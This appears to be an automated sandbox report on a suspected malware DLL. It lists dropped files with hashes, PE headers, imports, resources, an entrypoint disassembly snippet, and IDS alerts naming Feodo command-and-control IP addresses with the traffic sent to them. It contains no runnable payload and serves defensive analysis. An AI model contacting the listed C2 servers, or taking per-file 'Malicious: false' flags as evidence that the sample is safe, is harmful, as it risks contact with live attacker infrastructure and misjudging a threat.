Encrypted:	false
SSDEEP:	96:9GiZYW/rn6rYdYSW2AHQYEZRttk0iGPcIPFwrl+7nuawrwWMOIg13:9jZDUa32+juawrwWMZg13
MD5:	267C2A648995A08199033ACD2E827D02
SHA1:	CEC51F446E55D6FF19E639EEA353128D067CF902
SHA-256:	DB5531AE5E0D06AA5EC259421B7414FC0A0ABD7DCE135A0F43DF5C03FFD6D74E
SHA-512:	325A2BFD1CAAFA7A1FC582961C21991294D8098503DF55EEEA3A941AF6C7716A4E3FABECF0C5FE05DD3801BCFC413468DC47E85E322AD496FBFCA6B73EE31FB0
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE97.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8348
Entropy (8bit):	3.6982264435751433
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiQD6VpZ6YrGLSUuMUgmfdSwGt+pBa89bqHAsfWR0Hm:RrlsNi86VpZ6YASUuMUgmfdSwhqHTfZG
MD5:	6B12BE00F97C6C6DC508D125DB2F2217
SHA1:	91903EA164C37204BD5D0D297015903706C7B972
SHA-256:	E252A6A3F117F52E8C8968D5D18DEB0E1751BB73C1AFFA29C4CD7FC67919E37B
SHA-512:	3665EAE638F2E20EA879EDBB5E08D888F873983A954E288B7EF2E031B2613DE2CBD638A8C92C0A3041DF8D63312ADCF5D3CBBE59F7B05DD0500B428B4198C9D4
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.3.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF831.tmp.csv Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	56612
Entropy (8bit):	3.062685963408817
Encrypted:	false
SSDEEP:	768:PJH+urfEor3DP9dw5oATi5HcQt5XRxz+kePOnT6bUgm/ItfcRjLJXbZBe:PJH+urJr3DP9dw5oATiBXB7pbZBe
MD5:	ACBC56AD0EE1F5DA79BCD72111A9DA70
SHA1:	66466CF70A73CA41B4986A3F8D3DC08431130F83
SHA-256:	2F596476E16F989789A09DD9ACD66AFFB5BCC7D0500EAC32FB76061DFAC32710
SHA-512:	C7BE202BF408E83A505013F48A146AB1A883B3395B6DEA921BCB1364E8133B488F2C52592AAD607A956E2C96E4AD05521D8C04AFD6566A717E65ED127DE8DE5F
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Microsoft Cabinet archive data, 61414 bytes, 1 file
Category:	dropped
Size (bytes):	61414
Entropy (8bit):	7.995245868798237
Encrypted:	true
SSDEEP:	1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
MD5:	ACAEDA60C79C6BCAC925EEB3653F45E0
SHA1:	2AAAE490BCDACCC6172240FF1697753B37AC5578
SHA-256:	6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
SHA-512:	FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
Malicious:	false
Preview:	MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF....f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.a..x..O..V.t..Y1!.T..`U...-...< _@...\|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.109960193012848
Encrypted:	false
SSDEEP:	6:kKaa7k8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:F9kPlE99SNxAhUeYlUSA/t
MD5:	625BF18E5B8B9E78E27B0780DCA3407F
SHA1:	E52E613BD818E8738A1FD3DBEF57BFCD79FA4B33
SHA-256:	C3FAA0FF45581484CFF311A2FE3DC4769F7293C0E91A3D7C4C5EA6DF54FB49DD
SHA-512:	B83A962C56C509EBFEB5E0F7FA95CAA1C2C62716541FDF53FEA0636B99EFD26B96E693D3F8C5288F473D67B45FA29C9E9A849D1DCDE33C9317FC59FD49CE0373
Malicious:	false
Preview:	p...... ........7K..q...(....................................................... ........q.\].......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.7.1.e.1.5.c.5.d.c.4.d.7.1.:.0."...

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.238304098816333
Encrypted:	false
SSDEEP:	12288:aUrBOE+eqEnLWmIrnB9M5IvryG6poXRRdPIHwtP10EPr5Ryi:1rBOE+eqEnqmIrAqy
MD5:	C9EA3986CA830B3C6AFC33A32700CC94
SHA1:	5FC76B86169087044D821F9D2D2B560EB763BF6F
SHA-256:	88BE3C71D270A40635EEF002B95AC13932279D4EE5E2D57D777D4FF07AD7BDC7
SHA-512:	34178DFB928DF27D9C23BABF46EC174C485196EC6FB8B27E5047A9FC39A24624CBE8C90F8359F9AB5F4CBAA3EE3A527D60BD1B5F0E06886C73F00DC28D4A6741
Malicious:	false
Preview:	regfH...H...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..q................................................................................................................................................................................................................................................................................................................................................h..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	3.7217374537068912
Encrypted:	false
SSDEEP:	384:3Yc5K5Acv4KgnVVeeDzec1NKZtjET8GRFwTnl:oqKXg/eeDzeSNYtjFGRFwT
MD5:	FB018474B0F148A8657862E304B867FD
SHA1:	AAD40FC1783378C0FE589E275764C2E801D27E12
SHA-256:	4CC49C665379690002A5DBA6405B943C590981AD13A436B2937143190792FC93
SHA-512:	B9F88FD1BF076EEA17FADBA4CB02B5A17A3B4971946173A7A1157A035CF25B2AF8CFCD61F8FB5F9920C9BE0770187BCDB957F6DE6F7F2E564B3A12FCC0CF3111
Malicious:	false
Preview:	regfG...G...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..q................................................................................................................................................................................................................................................................................................................................................h..HvLE.>......G...........!...qJ..B..;O?.w........................hbin................p.\..,..........nk,...q.......@........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ...q....... ........................... .......Z.......................Root........lf......Root....nk ...q................................... ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.76756574902532
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 98.32% Windows Screen Saver (13104/52) 1.29% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	hPJnda9rBy.dll
File size:	588288
MD5:	56c2941eb73ea59306cc9d2a6b15974c
SHA1:	8d483f2069955ae7a3f7e70e6dafa2641cbf4a75
SHA256:	7caa923401ec9a16969f0b37225b77cd16c6923abff2eda76f1fa9a35bff2879
SHA512:	cdd0692c8a2bf51e1c27085869067f886680a4d0ee6d721d9ed337ba90e185d7af8c11db718850bd17fa49dd1bb903e412b6b4214cad8f22a766254bfd43b540
SSDEEP:	6144:cNU5LwA22222GgngDrDRVyYli/ci2tEGW78ODQiEjtvOSk5DKXOW14IkFxVFgY4E:x5w7YM/cYVV7E4OpOJyvnHtytFyQ
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m.......................................^F......^P.n....^W.t....^Y......^A......^G......^B.....Rich....................PE..L..

File Icon


Icon Hash:	71b018ccc6577131

Static PE Info

General
Entrypoint:	0x1002eaac
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp:	0x61E03DE6 [Thu Jan 13 14:57:42 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	7f57698bb210fa88a6b01b1feaf20957

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F52C4C513D7h
call 00007F52C4C59C48h
push dword ptr [ebp+08h]
mov ecx, dword ptr [ebp+10h]
mov edx, dword ptr [ebp+0Ch]
call 00007F52C4C512C1h
pop ecx
pop ebp
retn 000Ch
mov edi, edi
push ebp
mov ebp, esp
push esi
push edi
mov edi, dword ptr [ebp+10h]
mov eax, edi
sub eax, 00000000h
je 00007F52C4C529BBh
dec eax
je 00007F52C4C529A3h
dec eax
je 00007F52C4C5296Eh
dec eax
je 00007F52C4C5291Fh
dec eax
je 00007F52C4C5288Fh
mov ecx, dword ptr [ebp+0Ch]
mov eax, dword ptr [ebp+08h]
push ebx
push 00000020h
pop edx
jmp 00007F52C4C51847h
mov esi, dword ptr [eax]
cmp esi, dword ptr [ecx]
je 00007F52C4C5144Eh
movzx esi, byte ptr [eax]
movzx ebx, byte ptr [ecx]
sub esi, ebx
je 00007F52C4C513E7h
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, dword ptr [ebx+ebx-01h]
mov esi, ebx
test esi, esi
jne 00007F52C4C5183Fh
movzx esi, byte ptr [eax+01h]
movzx ebx, byte ptr [ecx+01h]
sub esi, ebx
je 00007F52C4C513E7h
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, dword ptr [ebx+ebx-01h]
mov esi, ebx
test esi, esi
jne 00007F52C4C5181Eh
movzx esi, byte ptr [eax+02h]
movzx ebx, byte ptr [ecx+02h]
sub esi, ebx
je 00007F52C4C513E7h
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, dword ptr [ebx+ebx-01h]
mov esi, ebx
test esi, esi
jne 00007F52C4C517FDh

Rich Headers

Programming Language:

[ C ] VS2008 build 21022
[LNK] VS2008 build 21022
[ C ] VS2005 build 50727
[ASM] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[EXP] VS2008 build 21022
[C++] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x50bc0	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4f538	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x89000	0x3410	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8d000	0x415c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x4bd00	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x47000	0x454	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x4f4b0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x45bb9	0x45c00	False	0.379756804435	data	6.37093799262	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x47000	0x9c10	0x9e00	False	0.357372428797	data	5.22176472438	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x51000	0x3735c	0x33800	False	0.741035535498	data	6.11335979295	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x89000	0x3410	0x3600	False	0.306640625	data	4.34913645958	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8d000	0x8c34	0x8e00	False	0.346308318662	data	4.00973830682	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x89ac0	0x134	data	Chinese	China
RT_CURSOR	0x89bf4	0xb4	data	Chinese	China
RT_CURSOR	0x89ca8	0x134	AmigaOS bitmap font	Chinese	China
RT_CURSOR	0x89ddc	0x134	data	Chinese	China
RT_CURSOR	0x89f10	0x134	data	Chinese	China
RT_CURSOR	0x8a044	0x134	data	Chinese	China
RT_CURSOR	0x8a178	0x134	data	Chinese	China
RT_CURSOR	0x8a2ac	0x134	data	Chinese	China
RT_CURSOR	0x8a3e0	0x134	data	Chinese	China
RT_CURSOR	0x8a514	0x134	data	Chinese	China
RT_CURSOR	0x8a648	0x134	data	Chinese	China
RT_CURSOR	0x8a77c	0x134	data	Chinese	China
RT_CURSOR	0x8a8b0	0x134	AmigaOS bitmap font	Chinese	China
RT_CURSOR	0x8a9e4	0x134	data	Chinese	China
RT_CURSOR	0x8ab18	0x134	data	Chinese	China
RT_CURSOR	0x8ac4c	0x134	data	Chinese	China
RT_BITMAP	0x8ad80	0xb8	data	Chinese	China
RT_BITMAP	0x8ae38	0x144	data	Chinese	China
RT_ICON	0x8af7c	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676	Chinese	China
RT_ICON	0x8b264	0x128	GLS_BINARY_LSB_FIRST	Chinese	China
RT_DIALOG	0x8b38c	0x33c	data	Chinese	China
RT_DIALOG	0x8b6c8	0xe2	data	Chinese	China
RT_DIALOG	0x8b7ac	0x34	data	Chinese	China
RT_STRING	0x8b7e0	0x4e	data	Chinese	China
RT_STRING	0x8b830	0x2c	data	Chinese	China
RT_STRING	0x8b85c	0x82	data	Chinese	China
RT_STRING	0x8b8e0	0x1d6	data	Chinese	China
RT_STRING	0x8bab8	0x160	data	Chinese	China
RT_STRING	0x8bc18	0x12e	data	Chinese	China
RT_STRING	0x8bd48	0x50	data	Chinese	China
RT_STRING	0x8bd98	0x44	data	Chinese	China
RT_STRING	0x8bddc	0x68	data	Chinese	China
RT_STRING	0x8be44	0x1b8	data	Chinese	China
RT_STRING	0x8bffc	0x104	data	Chinese	China
RT_STRING	0x8c100	0x24	data	Chinese	China
RT_STRING	0x8c124	0x30	data	Chinese	China
RT_GROUP_CURSOR	0x8c154	0x22	Lotus unknown worksheet or configuration, revision 0x2	Chinese	China
RT_GROUP_CURSOR	0x8c178	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c18c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c1a0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c1b4	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c1c8	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c1dc	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c1f0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c204	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c218	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c22c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c240	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c254	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c268	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c27c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_ICON	0x8c290	0x22	data	Chinese	China
RT_MANIFEST	0x8c2b4	0x15a	ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	GetOEMCP, GetCommandLineA, RtlUnwind, ExitProcess, HeapReAlloc, RaiseException, HeapSize, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetACP, IsValidCodePage, LCMapStringA, LCMapStringW, HeapCreate, HeapDestroy, GetStdHandle, GetCPInfo, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, GetConsoleCP, GetConsoleMode, GetStringTypeA, GetStringTypeW, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, GetLocaleInfoW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, GetModuleHandleW, CreateFileA, GetCurrentProcess, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, InterlockedIncrement, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, GlobalHandle, GlobalReAlloc, TlsGetValue, LocalAlloc, WritePrivateProfileStringA, GlobalFlags, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSection, GlobalGetAtomNameA, GlobalFindAtomA, lstrcmpW, GetVersionExA, FormatMessageA, LocalFree, lstrlenA, InterlockedDecrement, MulDiv, MultiByteToWideChar, GlobalUnlock, GlobalFree, FreeResource, GlobalAddAtomA, GetCurrentProcessId, GetLastError, GlobalDeleteAtom, GetCurrentThread, GetCurrentThreadId, ConvertDefaultLocale, EnumResourceLanguagesA, GetModuleFileNameA, GetLocaleInfoA, WideCharToMultiByte, CompareStringA, FindResourceA, LoadResource, LockResource, SizeofResource, InterlockedExchange, GlobalLock, lstrcmpA, GlobalAlloc, GetModuleHandleA, CreateThread, CloseHandle, VirtualProtect, LoadLibraryA, VirtualAlloc, GetProcAddress, SetLastError, Sleep, IsBadReadPtr, GetProcessHeap, VirtualFree, HeapFree, HeapAlloc, FreeLibrary, VirtualQuery, SetHandleCount, GetNativeSystemInfo
USER32.dll	LoadCursorA, GetSysColorBrush, SetWindowTextA, IsDialogMessageA, SetDlgItemTextA, GetDlgItemTextA, RegisterWindowMessageA, SendDlgItemMessageA, WinHelpA, GetCapture, GetClassLongA, GetClassNameA, SetPropA, GetPropA, RemovePropA, GetForegroundWindow, GetTopWindow, GetMessageTime, GetMessagePos, MapWindowPoints, SetMenu, SetForegroundWindow, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, AdjustWindowRectEx, CopyRect, PtInRect, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, SetWindowLongA, SetWindowPos, SystemParametersInfoA, GetWindowPlacement, GetWindowRect, GetMenuItemID, GetMenuItemCount, GetSubMenu, UnhookWindowsHookEx, GetSysColor, EndPaint, BeginPaint, ReleaseDC, GetDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, GetWindowTextLengthA, GetWindowTextA, GetWindow, SetFocus, GetDesktopWindow, SetActiveWindow, CreateDialogIndirectParamA, DestroyWindow, IsWindow, GetDlgItem, GetNextDlgTabItem, EndDialog, SetWindowsHookExA, CallNextHookEx, GetMessageA, DestroyMenu, UpdateWindow, TranslateMessage, DispatchMessageA, GetActiveWindow, IsWindowVisible, GetKeyState, PeekMessageA, GetCursorPos, ValidateRect, GetWindowThreadProcessId, GetWindowLongA, GetLastActivePopup, IsWindowEnabled, MessageBoxA, SetCursor, PostQuitMessage, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, LoadBitmapA, GetFocus, GetParent, ModifyMenuA, GetMenuState, EnableMenuItem, CheckMenuItem, SetTimer, IsIconic, KillTimer, LoadIconA, DrawIcon, GetClientRect, SendMessageA, ShowWindow, PostMessageA, GetSystemMetrics, EnableWindow, GetMenu
GDI32.dll	GetStockObject, SelectObject, GetDeviceCaps, DeleteDC, Escape, ExtTextOutA, TextOutA, RectVisible, ScaleWindowExtEx, SetWindowExtEx, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, CreateBitmap, PtVisible, GetObjectA, DeleteObject, GetClipBox, SetMapMode, SetTextColor, SetBkColor, RestoreDC, SaveDC, SetViewportOrgEx
WINSPOOL.DRV	DocumentPropertiesA, ClosePrinter, OpenPrinterA
ADVAPI32.dll	RegSetValueExA, RegCreateKeyExA, RegQueryValueA, RegOpenKeyA, RegEnumKeyA, RegDeleteKeyA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey
SHLWAPI.dll	PathFindExtensionA
OLEAUT32.dll	VariantClear, VariantChangeType, VariantInit
WS2_32.dll	htons, setsockopt, sendto, htonl, bind, socket, closesocket, inet_addr, recvfrom, WSACleanup, WSAStartup

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x1001df20

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/14/22-18:51:09.071744	TCP	2404332	ET CNC Feodo Tracker Reported CnC Server TCP group 17	49775	80	192.168.2.5	45.138.98.34
01/14/22-18:51:10.239050	TCP	2404338	ET CNC Feodo Tracker Reported CnC Server TCP group 20	49776	8080	192.168.2.5	69.16.218.101

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2022 19:07:39.790200949 CET	49770	80	192.168.2.4	45.138.98.34
Jan 14, 2022 19:07:39.807172060 CET	80	49770	45.138.98.34	192.168.2.4
Jan 14, 2022 19:07:40.403214931 CET	49770	80	192.168.2.4	45.138.98.34
Jan 14, 2022 19:07:40.420356989 CET	80	49770	45.138.98.34	192.168.2.4
Jan 14, 2022 19:07:41.012600899 CET	49770	80	192.168.2.4	45.138.98.34
Jan 14, 2022 19:07:41.029656887 CET	80	49770	45.138.98.34	192.168.2.4
Jan 14, 2022 19:07:41.041039944 CET	49771	8080	192.168.2.4	69.16.218.101
